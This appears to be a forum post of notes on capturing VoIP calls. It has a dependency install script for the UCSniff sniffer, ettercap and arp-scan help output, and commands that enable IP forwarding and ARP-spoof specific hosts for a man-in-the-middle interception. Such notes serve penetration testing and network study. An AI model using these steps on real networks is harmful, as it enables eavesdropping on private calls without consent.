Capture & Decode VOIP Calls With Wireshark

codingsec.net/2016/04/listen-to-a-voip-call-with-wireshark

Auto Script
Vid

Script:

Code:

#!/bin/bash
# chmod +x *.sh
#
apt-get update && apt upgrade -y
apt-get install -y build-essential
apt-get install -y zlib1g-dev liblzo2-dev
apt-get install -y libpcap0.8-dev libnet1-dev
apt-get install -y libasound2-dev
apt-get install -y libbz2-dev

#GUI Dependencies

apt-get install -y libx11-dev
apt-get install -y libxext-dev
apt-get install -y libfreetype6-dev

#Realtime Video Monitor Dependencies
#Note: The minimum version required for vlc and libvlc-dev is at least 2.0.1 (Twoflower) or later.

apt-get install -y vlc
apt-get install -y libvlc-dev

#A/V Muxing Dependencies

apt-get install -y libavformat-dev #(this should also install -y libavutil-dev and libavcodec-dev)
apt-get install -y libavdevice-dev
apt-get install -y libswscale-dev
apt-get install -y libavfilter-dev
apt-get install -y libx264-dev
apt-get install -y libav-tools

#Optional A/V Player/Muxing tools

apt-get install -y mplayer
apt-get install mencoder
apt-get install -y vlc && apt-get install -y libvlc-dev libfreetype6
#&& apt-get install x-window-system-dev



Notes & Links

Code:

echo 1 > /proc/sys/net/ipv4/ip_forward

Code:

arpspoof -t 192.168.0.3 192.168.0.24

arno0x0x.wordpress.com/2015/11/27/hacking-voip



jnet.forumotion.com/t1382-freepbx-upgrading-proceedure


Cisco uses CDP SIP (TCP layer) & RTP (UDP layer)


You will need to do a MITM ARP spoof attack to intercept voice vlan voip sip comunications!

Tools:

Code:

voiphopper -h
nmap
ucsniff

http://ucsniff.sourceforge.net/
http://ucsniff.sourceforge.net/lininstall.html

Default UCSniff Installation

UCSniff compiles and runs well on Ubuntu 12.04. The following steps show a simple installation of UCSniff for VoIP and Video-only sniffing:

    tar -zxvf ucsniff-xxx.tar.gz

Example:

Code:


tar -zxvf ucsniff-3.20.tar.gz


    cd ucsniff-xxx

Example:

Code:


    cd ucsniff-3.20

    ./configure

    make
    make install

Note: The configure script option of '--enable-libvlc' enables the realtime video monitor capability of UCSniff

Dependency packages for realtime video monitor:

Code:


apt-get install -y vlc && apt-get install -y libvlc-dev

./configure --enable-libvlc --enable-gui
make
make install

Code:

./configure --enable-gui

Note: The configure script option of '--enable-libvlc' enables the realtime video monitor capability of UCSniff



Any Problems email

ucsniff@viperlab.net



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Using ettercap:

Code:

ettercap -G

Usage: ettercap [OPTIONS] [TARGET1] [TARGET2]

TARGET is in the format MAC/IP/IPv6/PORTs (see the man for further detail)

Sniffing and Attack options:
  -M, --mitm     perform a mitm attack
  -o, --only-mitm             don't sniff, only perform the mitm attack
  -b, --broadcast             sniff packets destined to broadcast
  -B, --bridge         use bridged sniff (needs 2 ifaces)
  -p, --nopromisc             do not put the iface in promisc mode
  -S, --nosslmitm             do not forge SSL certificates
  -u, --unoffensive           do not forward packets
  -r, --read            read data from pcapfile
  -f, --pcapfilter    set the pcap filter
  -R, --reversed              use reversed TARGET matching
  -t, --proto          sniff only this proto (default is all)
      --certificate     certificate file to use for SSL MiTM
      --private-key     private key file to use for SSL MiTM

User Interface Type:
  -T, --text                  use text only GUI
       -q, --quiet                 do not display packet contents
       -s, --script           issue these commands to the GUI
  -C, --curses                use curses GUI
  -D, --daemon                daemonize ettercap (no GUI)
  -G, --gtk                   use GTK+ GUI

Logging options:
  -w, --write           write sniffed data to pcapfile
  -L, --log          log all the traffic to this
  -l, --log-info     log only passive infos to this
  -m, --log-msg      log all the messages to this
  -c, --compress              use gzip compression on log files

Visualization options:
  -d, --dns                   resolves ip addresses into hostnames
  -V, --visual        set the visualization format
  -e, --regex          visualize only packets matching this regex
  -E, --ext-headers           print extended header for every pck
  -Q, --superquiet            do not display user and password

LUA options:
      --lua-script ,[,...]     comma-separted list of LUA scripts
      --lua-args n1=v1,[n2=v2,...]               comma-separated arguments to LUA script(s)

General options:
  -i, --iface          use this network interface
  -I, --liface                show all the network interfaces
  -Y, --secondary     list of secondary network interfaces
  -n, --netmask      force this on iface
  -A, --address

     force this local

on iface
  -P, --plugin        launch this
  -F, --filter          load the filter (content filter)
  -z, --silent                do not perform the initial ARP scan
  -6, --ip6scan               send ICMPv6 probes to discover IPv6 nodes on the link
  -j, --load-hosts      load the hosts list from
  -k, --save-hosts      save the hosts list to
  -W, --wifi-key        use this key to decrypt wifi packets (wep or wpa)
  -a, --config        use the alterative config file

Standard options:
  -v, --version               prints the version and exit
  -h, --help                  this help screen

Code:

ifconfig

will help you find your ip address and adapter settings:

Make sure Kali 2 Sources are correct as follows:

Code:


#sudo gedit /etc/apt/sources.list
#

# deb cdrom:[Debian GNU/Linux 2017.1 _Kali-rolling_ - Official Snapshot amd64 LIVE/INSTALL Binary 20170416-02:08]/ kali-rolling contrib main non-free

#deb cdrom:[Debian GNU/Linux 2017.1 _Kali-rolling_ - Official Snapshot amd64 LIVE/INSTALL Binary 20170416-02:08]/ kali-rolling contrib main non-free

deb http://http.kali.org/kali kali-rolling main non-free contrib
deb-src http://http.kali.org/kali kali-rolling main non-free contrib

More Notes

jnet.forumotion.com/t1118-capture-decode-voip-calls-with-wireshark#2154



Helpful tools and codes to find Cisco devices on network:

Code:

arp-scan --interface=eth0 --localnet

arp-scan -h

Code:

arp-scan --vlan=1

--srcaddr= or -S Set the source Ethernet MAC address to .
            This sets the 48-bit hardware address in the Ethernet
            frame header for outgoing ARP packets. It does not
            change the hardware address in the ARP packet, see
            --arpsha for details on how to change that address.
            The default is the Ethernet address of the outgoing
            interface.

--destaddr= or -T Send the packets to Ethernet MAC address
            This sets the 48-bit destination address in the
            Ethernet frame header.
            The default is the broadcast address ff:ff:ff:ff:ff:ff.
            Most operating systems will also respond if the ARP
            request is sent to their MAC address, or to a
            multicast address that they are listening on.


Examples:

Code:

arp-scan --srcaddr= --destaddr=

You may like this script

jnet.forumotion.com/t1477-quick-scan-linux-script-security-tut#2157